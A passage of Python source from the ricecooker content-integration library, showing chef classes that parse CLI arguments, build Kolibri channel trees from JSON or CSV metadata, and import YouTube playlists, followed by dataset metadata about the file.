channel.\",\n )\n parser.add_argument(\n \"--sample\",\n type=int,\n metavar=\"SIZE\",\n help=\"Upload a sample of SIZE nodes from the channel.\",\n )\n parser.add_argument(\n \"--reset\",\n dest=\"reset_deprecated\",\n action=\"store_true\",\n help=\"(deprecated) Restarting the chef run is the default.\",\n )\n parser.add_argument(\n \"--stage\",\n dest=\"stage_deprecated\",\n action=\"store_true\",\n help=(\n \"(deprecated) Stage updated content for review.\"\n \" Uploading a staging tree is now the default behavior. Use --deploy to upload to the main tree.\"\n ),\n )\n\n # [OPTIONS] --- extra key=value options are supported, but do not appear in help\n\n self.load_chef_data()\n\n def get_setting(self, setting, default=None):\n \"\"\"\n Gets a setting set on the chef via its SETTINGS dictionary.\n\n It is recommended to use this method rather than checking SETTINGS directly,\n as it allows for a default when not set, and allows for command line overrides\n for some settings.\n\n :param setting: String key of the setting to check\n :param default: Value to return if the key is not found.\n :return: Setting value if set, or default if not set.\n \"\"\"\n\n override = None\n # If there is a command line flag for this setting, allow for it to override the chef\n # default. Note that these are all boolean flags, so they are true if set, false if not.\n if setting == \"thumbnails\":\n override = self.args and self.args[\"thumbnails\"]\n\n if setting == \"compress\":\n override = self.args and self.args[\"compress\"]\n\n if setting in self.SETTINGS:\n return override or self.SETTINGS[setting]\n\n return override or default\n\n def parse_args_and_options(self):\n \"\"\"\n Parses all known command line args and also additional key=value options.\n NOTE: this should be the only place cli args are parsed in order to have\n a single consistent interface for all chef scripts.\n\n Args: None, but implicitly depends on `self.arg_parser` and `sys.argv`\n Returns:\n tuple (`args`, `options`)\n args (dict): chef command line arguments\n options (dict): extra key=value options given on command line\n \"\"\"\n args_namespace, options_list = self.arg_parser.parse_known_args()\n args = args_namespace.__dict__\n\n # Handle case when command is not specified but key=value options are\n allcommands = [\n \"uploadchannel\", # Whole pipeline: pre_run > run > [deploy,publish]\n \"dryrun\", # Do pre_run and run but do not upload to Studio\n ]\n command_arg = args[\"command\"]\n if command_arg not in allcommands and \"=\" in command_arg:\n # a key=value options pair was incorrectly recognized as the command\n args[\"command\"] = \"uploadchannel\"\n options_list.append(command_arg) # put command_arg where it belongs\n\n # Print CLI deprecation warnings info\n if args[\"stage_deprecated\"]:\n config.LOGGER.warning(\n \"DEPRECATION WARNING: --stage is now the default bevavior. The --stage flag has been deprecated and will be removed in ricecooker 1.0.\"\n )\n if args[\"reset_deprecated\"]:\n config.LOGGER.warning(\n \"DEPRECATION WARNING: --reset is now the default bevavior. The --reset flag has been deprecated and will be removed in ricecooker 1.0.\"\n )\n if args[\"publish\"] and args[\"stage\"]:\n raise InvalidUsageException(\n \"The --publish argument must be used together with --deploy argument.\"\n )\n logging_args = [key for key in [\"quiet\", \"warn\", \"debug\"] if args[key]]\n if len(logging_args) > 1:\n raise InvalidUsageException(\n \"Agruments --quiet, --warn, and --debug cannot be used together.\"\n )\n\n if args[\"command\"] == \"uploadchannel\":\n # Make sure token is provided. There are four ways to specify:\n # 1. --token=path to token-containing file\n # 2. --token=140fefe...1f3\n # when --token is not given on the command line, it default to # and\n # 3. we look for environment variable STUDIO_TOKEN\n # 4. else prompt user\n # If ALL of these fail, this call will raise and chef run will stop.\n args[\"token\"] = get_content_curation_token(args[\"token\"])\n\n # Parse additional keyword arguments from `options_list`\n options = {}\n for preoption in options_list:\n try:\n option_key, option_value = preoption.split(\"=\")\n options.update({option_key.strip(): option_value.strip()})\n except IndexError:\n msg = \"Invalid option '{0}': use [key]=[value] format (no whitespace)\".format(\n preoption\n )\n raise InvalidUsageException(msg)\n\n self.args = args\n self.options = options\n\n return args, options\n\n def config_logger(self, args, options):\n \"\"\"\n Set up stream (stderr), local file logging (logs/yyyy-mm-dd__HHMM.log).\n This method is called as soon as we parse args so we can apply the\n user-preferred logging level settings.\n \"\"\"\n # Set desired logging level based on command line arguments\n level = logging.INFO\n if args[\"debug\"]:\n level = logging.DEBUG\n elif args[\"warn\"]:\n level = logging.WARNING\n elif args[\"quiet\"]:\n level = logging.ERROR\n\n # 2. File handler (logs/yyyy-mm-dd__HHMM.log)\n try:\n # FIXME: This code assumes we run chefs from the chef's root directory.\n # We probably want to have chefs set a root directory for files like this.\n if not os.path.exists(\"logs\"):\n os.makedirs(\"logs\")\n logfile_main = datetime.now().strftime(\"%Y-%m-%d__%H%M\") + \".log\"\n logfile_error = datetime.now().strftime(\"%Y-%m-%d__%H%M\") + \".err.log\"\n main_log = os.path.join(\"logs\", logfile_main)\n error_log = os.path.join(\"logs\", logfile_error)\n\n config.setup_logging(level=level, main_log=main_log, error_log=error_log)\n\n except Exception as e:\n config.LOGGER.warning(\"Unable to setup file logging due to %s\" % e)\n\n def get_channel(self, **kwargs):\n \"\"\"\n This method creates an empty `ChannelNode` object based on info from the\n chef class' `channel_info` attribute. A subclass can ovveride this method\n in cases where channel metadata is dynamic and depends on `kwargs`.\n Args:\n kwargs (dict): additional keyword arguments given to `uploadchannel`\n Returns: an empty `ChannelNode` that contains all the channel metadata\n \"\"\"\n if hasattr(self, \"channel_info\"):\n # Make sure we're not using the template id values in `channel_info`\n template_domains = [\"\"]\n using_template_domain = (\n self.channel_info[\"CHANNEL_SOURCE_DOMAIN\"] in template_domains\n )\n if using_template_domain:\n config.LOGGER.error(\n \"Template source domain detected. Please change CHANNEL_SOURCE_DOMAIN before running this chef.\"\n )\n\n template_ids = [\"\", \"\"]\n using_template_source_id = (\n self.channel_info[\"CHANNEL_SOURCE_ID\"] in template_ids\n )\n if using_template_source_id:\n config.LOGGER.error(\n \"Template channel source ID detected. Please change CHANNEL_SOURCE_ID before running this chef.\"\n )\n\n if using_template_domain or using_template_source_id:\n sys.exit(1)\n\n # If a sublass has an `channel_info` attribute (dict) it doesn't need\n # to define a `get_channel` method and instead rely on this code:\n channel = self.channel_node_class(\n source_domain=self.channel_info[\"CHANNEL_SOURCE_DOMAIN\"],\n source_id=self.channel_info[\"CHANNEL_SOURCE_ID\"],\n title=self.channel_info[\"CHANNEL_TITLE\"],\n tagline=self.channel_info.get(\"CHANNEL_TAGLINE\"),\n channel_id=self.channel_info.get(\"CHANNEL_ID\"),\n thumbnail=self.channel_info.get(\"CHANNEL_THUMBNAIL\"),\n language=self.channel_info.get(\"CHANNEL_LANGUAGE\"),\n description=self.channel_info.get(\"CHANNEL_DESCRIPTION\"),\n )\n return channel\n else:\n raise NotImplementedError(\n \"Subclass must define get_channel method or have a channel_info (dict) attribute.\"\n )\n\n def construct_channel(self, **kwargs):\n \"\"\"\n This should be overriden by the chef script's construct_channel method.\n Args:\n kwargs (dict): additional keyword arguments given to `uploadchannel`\n Returns: a `ChannelNode` object representing the populated topic tree\n \"\"\"\n raise NotImplementedError(\"Chef subclass must implement this method\")\n\n def load_chef_data(self):\n if os.path.exists(config.DATA_PATH):\n self.CHEF_RUN_DATA = json.load(open(config.DATA_PATH))\n\n def save_channel_tree_as_json(self, channel):\n filename = os.path.join(\n self.TREES_DATA_DIR, \"{}.json\".format(self.CHEF_RUN_DATA[\"current_run\"])\n )\n os.makedirs(self.TREES_DATA_DIR, exist_ok=True)\n json.dump(channel.get_json_tree(), open(filename, \"w\"), indent=2)\n self.CHEF_RUN_DATA[\"tree_archives\"][\"previous\"] = self.CHEF_RUN_DATA[\n \"tree_archives\"\n ][\"current\"]\n self.CHEF_RUN_DATA[\"tree_archives\"][\"current\"] = filename.replace(\n os.getcwd() + \"/\", \"\"\n )\n self.save_chef_data()\n\n def save_channel_metadata_as_csv(self, channel):\n # create data folder in chefdata\n DATA_DIR = os.path.join(\"chefdata\", \"data\")\n os.makedirs(DATA_DIR, exist_ok=True)\n metadata_csv = csv.writer(\n open(\n os.path.join(DATA_DIR, \"content_metadata.csv\"),\n \"w\",\n newline=\"\",\n encoding=\"utf-8\",\n )\n )\n metadata_csv.writerow(config.CSV_HEADERS)\n\n channel.save_channel_children_to_csv(metadata_csv)\n\n def load_channel_metadata_from_csv(self):\n metadata_dict = dict()\n metadata_csv = None\n CSV_FILE_PATH = os.path.join(\"chefdata\", \"data\", \"content_metadata.csv\")\n if os.path.exists(CSV_FILE_PATH):\n metadata_csv = csv.DictReader(open(CSV_FILE_PATH, \"r\", encoding=\"utf-8\"))\n for line in metadata_csv:\n # Add to metadata_dict any updated data. Skip if none\n line_source_id = line[\"Source ID\"]\n line_new_title = line[\"New Title\"]\n line_new_description = line[\"New Description\"]\n line_new_tags = line[\"New Tags\"]\n if (\n line_new_title != \"\"\n or line_new_description != \"\"\n or line_new_tags != \"\"\n ):\n metadata_dict[line_source_id] = {}\n if line_new_title != \"\":\n metadata_dict[line_source_id][\"New Title\"] = line_new_title\n if line_new_description != \"\":\n metadata_dict[line_source_id][\n \"New Description\"\n ] = line_new_description\n if line_new_tags != \"\":\n tags_arr = re.split(\",| ,\", line_new_tags)\n metadata_dict[line_source_id][\"New Tags\"] = tags_arr\n return metadata_dict\n\n def save_chef_data(self):\n json.dump(self.CHEF_RUN_DATA, open(config.DATA_PATH, \"w\"), indent=2)\n\n def apply_modifications(self, contentNode, metadata_dict={}):\n # Skip if no metadata file passed in or no updates in metadata_dict\n if metadata_dict == {}:\n return\n\n is_channel = isinstance(contentNode, nodes.ChannelNode)\n\n if not is_channel:\n # Add modifications to contentNode\n if contentNode.source_id in metadata_dict:\n contentNode.node_modifications = metadata_dict[contentNode.source_id]\n for child in contentNode.children:\n self.apply_modifications(child, metadata_dict)\n\n def pre_run(self, args, options):\n \"\"\"\n This function is called before the Chef's `run` mehod is called.\n By default this function does nothing, but subclass can use this hook to\n run prerequisite tasks.\n Args:\n args (dict): chef command line arguments\n options (dict): extra key=value options given on command line\n \"\"\"\n\n def run(self, args, options):\n \"\"\"\n This function calls uploadchannel which performs all the run steps:\n Args:\n args (dict): chef command line arguments\n options (dict): additional key=value options given on command line\n \"\"\"\n args_copy = args.copy()\n args_copy[\"token\"] = args_copy[\"token\"][0:6] + \"...\"\n config.LOGGER.info(\n \"In SushiChef.run method. args=\"\n + str(args_copy)\n + \" options=\"\n + str(options)\n )\n\n run_id = datetime.now().strftime(\"%Y-%m-%d__%H%M\")\n self.CHEF_RUN_DATA[\"current_run\"] = run_id\n self.CHEF_RUN_DATA[\"runs\"].append({\"id\": run_id})\n\n # TODO(Kevin): move self.download_content() call here\n self.pre_run(args, options)\n uploadchannel_wrapper(self, args, options)\n\n def main(self):\n \"\"\"\n Main entry point that content integration scripts should call.\n \"\"\"\n args, options = self.parse_args_and_options()\n self.config_logger(args, options)\n self.run(args, options)\n\n\n# JSON TREE CHEF\n################################################################################\n\n\nclass JsonTreeChef(SushiChef):\n \"\"\"\n This sushi chef loads the data from a channel from a ricecooker json tree file\n which conatins the json representation of a full ricecooker node tree.\n For example the content hierarchy with two levels of subfolders and a PDF\n content node looks like this::\n\n {\n \"title\": \"Open Stax\",\n \"source_domain\": \"openstax.org\",\n \"source_id\": \"open-stax\",\n \"language\": \"en\",\n \"children\": [\n {\n \"kind\": \"topic\",\n \"title\": \"Humanities\",\n \"children\": [\n {\n \"kind\": \"topic\",\n \"title\": \"U.S. History\",\n \"children\": [\n {\n \"kind\": \"document\",\n \"source_id\": \"Open Stax/Humanities/U.S. History/Student Handbook.pdf\",\n \"title\": \"Student Handbook\",\n \"author\": \"P. Scott Corbett, Volker Janssen, ...\"\",\n \"license\": {\n \"license_id\": \"CC BY\"\n },\n \"files\": [\n {\n \"file_type\": \"document\",\n \"path\": \"content/open_stax_zip/Open Stax/Humanities/U.S. History/Student Handbook.pdf\"\n }\n ]\n }]}]}]}\n\n Each object in the json tree correponds to a TopicNode, a ContentNode that\n contains a Files or an Exercise that contains Question.\n \"\"\"\n\n RICECOOKER_JSON_TREE = \"ricecooker_json_tree.json\"\n\n def pre_run(self, args, options):\n \"\"\"\n This function is called before `run` to create the json tree file.\n \"\"\"\n raise NotImplementedError(\n \"JsonTreeChef subclass must implement the `pre_run` method.\"\n )\n\n def get_json_tree_path(self, *args, **kwargs):\n \"\"\"\n Return path to ricecooker json tree file. Override this method to use\n a custom filename, e.g., for channel with multiple languages.\n \"\"\"\n json_tree_path = os.path.join(self.TREES_DATA_DIR, self.RICECOOKER_JSON_TREE)\n return json_tree_path\n\n def get_channel(self, **kwargs):\n # Load channel info from json_tree\n json_tree_path = self.get_json_tree_path(**kwargs)\n json_tree = read_tree_from_json(json_tree_path)\n channel = get_channel_node_from_json(json_tree)\n return channel\n\n def construct_channel(self, **kwargs):\n \"\"\"\n Build the channel tree by adding TopicNodes and ContentNode children.\n \"\"\"\n channel = self.get_channel(**kwargs)\n json_tree_path = self.get_json_tree_path(**kwargs)\n json_tree = read_tree_from_json(json_tree_path)\n build_tree_from_json(channel, json_tree[\"children\"])\n raise_for_invalid_channel(channel)\n return channel\n\n\n# SOUSCHEF LINECOOK\n################################################################################\n\n\nclass LineCook(JsonTreeChef):\n \"\"\"\n This sushi chef uses os.walk to import the content in `channeldir` folder\n `directory structure + CSV metadata files --> Kolibri channel`.\n Folders and CSV files can be creaed by hand or by a `souschef` script.\n \"\"\"\n\n metadata_provider = None\n\n def __init__(self, *args, **kwargs):\n super(LineCook, self).__init__(*args, **kwargs)\n\n # We don't want to add argparse help if subclass has an __init__ method\n subclasses = self.__class__.__mro__[:-5] # all subclasses after this\n if any([\"__init__\" in c.__dict__.keys() for c in subclasses]):\n add_parser_help = False # assume subclass' __init__ will add help\n else:\n add_parser_help = True\n\n self.arg_parser = argparse.ArgumentParser(\n description=\"Upload the folder hierarchy to the content workshop.\",\n add_help=add_parser_help,\n parents=[self.arg_parser],\n )\n self.arg_parser.add_argument(\n \"--channeldir\",\n required=True,\n action=FolderExistsAction,\n help=\"The directory that corresponds to the root of the channel.\",\n )\n self.arg_parser.add_argument(\n \"--channelinfo\",\n default=DEFAULT_CHANNEL_INFO_FILENAME,\n help=\"Filename for the channel metadata (assumed to be sibling of channeldir)\",\n )\n self.arg_parser.add_argument(\n \"--contentinfo\",\n default=DEFAULT_CONTENT_INFO_FILENAME,\n help=\"Filename for content metadata (assumed to be sibling of channeldir)\",\n )\n self.arg_parser.add_argument(\n \"--exercisesinfo\",\n default=DEFAULT_EXERCISES_INFO_FILENAME,\n help=\"Filename for execises metadata (assumed to be sibling of channeldir)\",\n )\n self.arg_parser.add_argument(\n \"--questionsinfo\",\n default=DEFAULT_EXERCISE_QUESTIONS_INFO_FILENAME,\n help=\"Filename for execise questions metadata (assumed to be sibling of channeldir)\",\n )\n self.arg_parser.add_argument(\n \"--generate\",\n action=\"store_true\",\n help=\"Generate metadata files from directory stucture.\",\n )\n self.arg_parser.add_argument(\n \"--importstudioid\",\n help=\"Generate CSV metadata from a specified studio_id (e.g. studio_id of main_tree for some channel)\",\n )\n\n def _init_metadata_provider(self, args, options):\n if args[\"contentinfo\"].endswith(\".csv\"):\n metadata_provider = CsvMetadataProvider(\n args[\"channeldir\"],\n channelinfo=args[\"channelinfo\"],\n contentinfo=args[\"contentinfo\"],\n exercisesinfo=args[\"exercisesinfo\"],\n questionsinfo=args[\"questionsinfo\"],\n )\n else:\n raise ValueError(\"Uknown contentinfo file format \" + args[\"contentinfo\"])\n self.metadata_provider = metadata_provider\n\n def pre_run(self, args, options):\n \"\"\"\n This function is called before `run` in order to build the json tree.\n \"\"\"\n if \"generate\" in args and args[\"generate\"]:\n self.metadata_provider = CsvMetadataProvider(\n args[\"channeldir\"],\n channelinfo=args[\"channelinfo\"],\n contentinfo=args[\"contentinfo\"],\n exercisesinfo=args[\"exercisesinfo\"],\n questionsinfo=args[\"questionsinfo\"],\n validate_and_cache=False,\n )\n self.metadata_provider.generate_templates(exercise_questions=True)\n self.metadata_provider.generate_contentinfo_from_channeldir(args, options)\n sys.exit(0)\n\n elif \"importstudioid\" in args and args[\"importstudioid\"]:\n studio_id = args[\"importstudioid\"]\n config.LOGGER.info(\"Calling with importstudioid... \" + studio_id)\n self.metadata_provider = CsvMetadataProvider(\n args[\"channeldir\"],\n channelinfo=args[\"channelinfo\"],\n contentinfo=args[\"contentinfo\"],\n exercisesinfo=args[\"exercisesinfo\"],\n questionsinfo=args[\"questionsinfo\"],\n validate_and_cache=False,\n )\n self.metadata_provider.generate_templates(exercise_questions=True)\n self.metadata_provider.generate_exercises_from_importstudioid(args, options)\n sys.exit(0)\n\n if self.metadata_provider is None:\n self._init_metadata_provider(args, options)\n kwargs = {} # combined dictionary of argparse args and extra options\n kwargs.update(args)\n kwargs.update(options)\n json_tree_path = self.get_json_tree_path(**kwargs)\n build_ricecooker_json_tree(\n args, options, self.metadata_provider, json_tree_path\n )\n\n\nclass YouTubeSushiChef(SushiChef):\n \"\"\"\n Class for converting a list of YouTube playlists and/or videos into a channel.\n\n To use this class, your subclass must implement either the get_playlist_ids() or\n the get_video_ids() method, along with the get_\n \"\"\"\n\n CONTENT_ARCHIVE_VERSION = 1\n DATA_DIR = os.path.abspath(\"chefdata\")\n YOUTUBE_CACHE_DIR = os.path.join(DATA_DIR, \"youtubecache\")\n DOWNLOADS_DIR = os.path.join(DATA_DIR, \"downloads\")\n ARCHIVE_DIR = os.path.join(\n DOWNLOADS_DIR, \"archive_{}\".format(CONTENT_ARCHIVE_VERSION)\n )\n USE_PROXY = False\n\n def get_playlist_ids(self):\n \"\"\"\n This method should be implemented by subclasses and return a list of playlist IDs.\n It currently doesn't support full YouTube URLs.\n\n :return: A list of playlists to include in the channel, defaults to empty list.\n \"\"\"\n return []\n\n def get_video_ids(self):\n \"\"\"\n This method should be implemented by subclasses and return a list of video IDs.\n It currently doesn't support full YouTube URLs.\n\n :return: A list of videos to include in the channel, defaults to empty list.\n \"\"\"\n return []\n\n def get_channel_metadata(self):\n \"\"\"\n Must be implemented by subclasses. Returns a dictionary. Keys can be a special value 'defualt'\n or a specific playlist or video id to apply the value to.\n\n Currently supported metadata fields are 'license', 'author', and 'provider'.\n\n :return: A dictionary of metadata values to apply to the content.\n \"\"\"\n raise NotImplementedError(\"get_channel_metadata must be implemented.\")\n\n def get_metadata_for_video(self, field, youtube_id=None, playlist_id=None):\n \"\"\"\n Retrieves the metadata value for the metadata field \"field\". If the\n youtube_id or playlist_id are specified, it will try to retrieve values\n for that specific video or playlist. If not found, it will look for a default\n value and return that.\n\n :param field: String name of metadata field.\n :param youtube_id: String ID of the video to retrieve data for. Defaults to None.\n :param playlist_id: String ID of the playlist to retrieve data for. Defaults to None.\n\n :return: The value (typically string), or None if not found.\n \"\"\"\n metadata = self.get_channel_metadata()\n if youtube_id and youtube_id in metadata and field in metadata[youtube_id]:\n return metadata[youtube_id][field]\n elif playlist_id and playlist_id in metadata and field in metadata[playlist_id]:\n return metadata[playlist_id][field]\n elif field in metadata[\"defaults\"]:\n return metadata[\"defaults\"][field]\n\n return None\n\n def create_nodes_for_playlists(self):\n # Note: We build the tree and download at the same time here for convenience. YT playlists\n # usually aren't massive, and parallel downloading increases the chances of being blocked.\n # We may want to experiment with parallel downloading in the future.\n\n os.makedirs(self.ARCHIVE_DIR, exist_ok=True)\n\n playlist_nodes = []\n\n for playlist_id in self.get_playlist_ids():\n\n playlist = YouTubePlaylistUtils(\n id=playlist_id, cache_dir=self.YOUTUBE_CACHE_DIR\n )\n\n playlist_info = playlist.get_playlist_info(use_proxy=self.USE_PROXY)\n\n # Get channel description if there is any\n playlist_description = \"\"\n if playlist_info[\"description\"]:\n playlist_description = playlist_info[\"description\"]\n\n topic_source_id = \"playlist-{0}\".format(playlist_id)\n topic_node = nodes.TopicNode(\n title=playlist_info[\"title\"],\n source_id=topic_source_id,\n description=playlist_description,\n )\n playlist_nodes.append(topic_node)\n\n video_ids = []\n\n # insert videos into playlist topic after creation\n for child in playlist_info[\"children\"]:\n # check for duplicate videos\n if child[\"id\"] not in video_ids:\n video_node = self.create_video_node(\n child, parent_id=topic_source_id\n )\n if video_node:\n topic_node.add_child(video_node)\n video_ids.append(child[\"id\"])\n\n else:\n continue\n\n return playlist_nodes\n\n def create_video_node(self, video_id, parent_id=\"\", playlist_id=None):\n video = YouTubeVideoUtils(id=video_id, cache_dir=False)\n video_details = video.get_video_info(use_proxy=self.USE_PROXY)\n if not video_details:\n config.LOGGER.error(\"Unable to retrieve video info: {}\".format(video_id))\n return None\n video_source_id = \"{0}-{1}\".format(parent_id, video_details[\"id\"])\n\n # Check youtube thumbnail extension as some are not supported formats\n thumbnail_link = video_details[\"thumbnail\"]\n config.LOGGER.info(\"thumbnail = {}\".format(thumbnail_link))\n archive_filename = get_archive_filename(\n thumbnail_link, download_root=self.ARCHIVE_DIR\n )\n\n dest_file = os.path.join(self.ARCHIVE_DIR, archive_filename)\n os.makedirs(os.path.dirname(dest_file), exist_ok=True)\n config.LOGGER.info(\"dest_file = {}\".format(dest_file))\n\n # Download and convert thumbnail, if necessary.\n response = requests.get(thumbnail_link, stream=True)\n # Some images that YT returns are actually webp despite their extension,\n # so make sure we update our file extension to match.\n if (\n \"Content-Type\" in response.headers\n and response.headers[\"Content-Type\"] == \"image/webp\"\n ):\n base_path, ext = os.path.splitext(dest_file)\n dest_file = base_path + \".webp\"\n\n if response.status_code == 200:\n with open(dest_file, \"wb\") as f:\n for chunk in response.iter_content(1024):\n f.write(chunk)\n\n if dest_file.lower().endswith(\".webp\"):\n dest_file = convert_image(dest_file)\n\n video_node = nodes.VideoNode(\n source_id=video_source_id,\n title=video_details[\"title\"],\n description=video_details[\"description\"],\n language=self.channel_info[\"CHANNEL_LANGUAGE\"],\n author=self.get_metadata_for_video(\"author\", video_id, playlist_id) or \"\",\n provider=self.get_metadata_for_video(\"provider\", video_id, playlist_id)\n or \"\",\n thumbnail=dest_file,\n license=self.get_metadata_for_video(\"license\", video_id, playlist_id),\n files=[\n files.YouTubeVideoFile(\n youtube_id=video_id,\n language=\"en\",\n high_resolution=self.get_metadata_for_video(\n \"high_resolution\", video_id, playlist_id\n )\n or False,\n )\n ],\n )\n return video_node\n\n def create_nodes_for_videos(self):\n node_list = []\n for video_id in self.get_video_ids():\n node = self.create_video_node(video_id)\n if node:\n node_list.append(node)\n\n return node_list\n\n def construct_channel(self, *args, **kwargs):\n \"\"\"\n Default construct_channel method for YouTubeSushiChef, override if more custom handling\n is needed.\n \"\"\"\n channel = self.get_channel(*args, **kwargs)\n\n if len(self.get_playlist_ids()) == 0 and len(self.get_video_ids()) == 0:\n raise NotImplementedError(\n \"Either get_playlist_ids() or get_video_ids() must be implemented.\"\n )\n\n # TODO: Replace next line with chef code\n nodes = self.create_nodes_for_playlists()\n for node in nodes:\n channel.add_child(node)\n\n nodes = self.create_nodes_for_videos()\n for node in nodes:\n channel.add_child(node)\n\n return channel\n", "repo_name": "learningequality/ricecooker", "sub_path": "ricecooker/chefs.py", "file_name": "chefs.py", "file_ext": "py", "file_size_in_byte": 37099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "61", "api": [{"api_name": "classes.nodes.ChannelNode", "line_number": 51, "usage_type": "attribute"}, {"api_name": "classes.nodes", "line_number": 51, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 67, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 75, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "managers.progress.Status", "line_number": 147, "usage_type": "name"}, {"api_name": "exceptions.InvalidUsageException", "line_number": 259, "usage_type": "call"}, {"api_name": "exceptions.InvalidUsageException", "line_number": 264, "usage_type": "call"}, {"api_name": "utils.tokens.get_content_curation_token", "line_number": 276, "usage_type": "call"}, {"api_name": "exceptions.InvalidUsageException", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 302, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 304, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 306, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 308, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path", "line_number": 314, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 315, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 316, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 316, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 317, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 317, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path", "line_number": 319, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 356, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 386, "usage_type": "call"}, {"api_name": "os.path", "line_number": 386, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 387, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 390, "usage_type": "call"}, {"api_name": "os.path", "line_number": 390, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 393, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 394, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 406, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 409, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 422, "usage_type": "call"}, {"api_name": "os.path", "line_number": 422, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 423, "usage_type": "call"}, {"api_name": "os.path", "line_number": 423, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 424, "usage_type": "call"}, {"api_name": "re.split", "line_number": 444, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 449, "usage_type": "call"}, {"api_name": "classes.nodes.ChannelNode", "line_number": 456, "usage_type": "attribute"}, {"api_name": "classes.nodes", "line_number": 456, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 491, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 491, "usage_type": "name"}, {"api_name": "commands.uploadchannel_wrapper", "line_number": 497, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "utils.jsontrees.read_tree_from_json", "line_number": 574, "usage_type": "call"}, {"api_name": "utils.jsontrees.get_channel_node_from_json", "line_number": 575, "usage_type": "call"}, {"api_name": "utils.jsontrees.read_tree_from_json", "line_number": 584, "usage_type": "call"}, {"api_name": "utils.jsontrees.build_tree_from_json", "line_number": 585, "usage_type": "call"}, {"api_name": "exceptions.raise_for_invalid_channel", "line_number": 586, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 613, "usage_type": "call"}, {"api_name": "utils.linecook.FolderExistsAction", "line_number": 621, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_CHANNEL_INFO_FILENAME", "line_number": 626, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_CONTENT_INFO_FILENAME", "line_number": 631, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_EXERCISES_INFO_FILENAME", "line_number": 636, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_EXERCISE_QUESTIONS_INFO_FILENAME", "line_number": 641, "usage_type": "name"}, {"api_name": "utils.metadata_provider.CsvMetadataProvider", "line_number": 656, "usage_type": "call"}, {"api_name": "utils.metadata_provider.CsvMetadataProvider", "line_number": 672, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 682, "usage_type": "call"}, {"api_name": "utils.metadata_provider.CsvMetadataProvider", "line_number": 687, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 697, "usage_type": "call"}, {"api_name": "utils.linecook.build_ricecooker_json_tree", "line_number": 705, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 719, "usage_type": "call"}, {"api_name": "os.path", "line_number": 719, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 720, "usage_type": "call"}, {"api_name": "os.path", "line_number": 720, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 721, "usage_type": "call"}, {"api_name": "os.path", "line_number": 721, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 722, "usage_type": "call"}, {"api_name": "os.path", "line_number": 722, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 784, "usage_type": "call"}, {"api_name": "utils.youtube.YouTubePlaylistUtils", "line_number": 790, "usage_type": "call"}, {"api_name": "classes.nodes.TopicNode", "line_number": 802, "usage_type": "call"}, {"api_name": "classes.nodes", "line_number": 802, "usage_type": "name"}, {"api_name": "utils.youtube.YouTubeVideoUtils", "line_number": 828, "usage_type": "call"}, {"api_name": "utils.downloader.get_archive_filename", "line_number": 838, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 842, "usage_type": "call"}, {"api_name": "os.path", "line_number": 842, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 843, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 843, "usage_type": "call"}, {"api_name": "os.path", "line_number": 843, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 847, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 854, "usage_type": "call"}, {"api_name": "os.path", "line_number": 854, "usage_type": "attribute"}, {"api_name": "ricecooker.utils.images.convert_image", "line_number": 863, "usage_type": "call"}, {"api_name": "classes.nodes.VideoNode", "line_number": 865, "usage_type": "call"}, {"api_name": "classes.nodes", "line_number": 865, "usage_type": 